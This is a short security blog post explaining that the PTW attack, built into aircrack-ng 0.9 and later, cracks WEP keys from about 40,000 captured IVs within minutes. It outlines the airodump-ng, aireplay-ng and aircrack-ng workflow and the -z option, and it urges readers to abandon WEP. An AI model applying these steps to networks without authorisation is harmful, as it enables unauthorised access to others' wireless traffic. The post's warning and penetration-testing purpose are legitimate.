base under attack
ethical hacking, penetration testing, IT security and other news

It has been trivial to break WEP for years now. Automated tools using statistical attacks and traffic injection have made it easy to break WEP keys (both 108-bit and 40-bit) on average laptop or desktop hardware in a matter of hours.

Now, it is even more of a joke to break WEP. A new attack, called PTW, has been demonstrated to break 108-bit WEP keys with as little as 40,000 IVs - which can be done via injection in only minutes. If you’re still using WEP, stop it. Now.

The PTW attack has been implemented into aircrack-ng versions 0.9 and up. New versions of aircrack-ng can be downloaded here. For those of you using Backtrack 2 - it comes with an older version of aircrack-ng, so you’ll need to upgrade either by compiling the source or using the latest Slax module (which is a development version, but it usually works well).

The process of breaking the key using PTW works similarly to the old attacks - start gathering a capture file with airodump-ng, inject traffic with aireplay-ng to speed things up (if necessary), and load the capture files into aircrack-ng. There are a few minor differences:

1. The PTW attack will give up very quickly if you don’t have enough IVs, rather than going on forever like the old methods (with probably no chance to crack the key). It will resume cracking for every 5,000 additional IVs, rather than tying up your resources in between.

2. The PTW attack only works with full capture files. Files containing IVs only (.ivs) are not currently supported.

3. You must use the -z option in Aircrack 0.9.x to use the PTW attack. In the latest development versions (1.0.x), this attack is the default.

I’ve tested the PTW attack on my access point at home, and it was able to retrieve a 108-bit key with about 50,000 IVs. Injecting the traffic using aireplay-ng’s ARP attack took only a few minutes. 40-bit keys can be done even faster.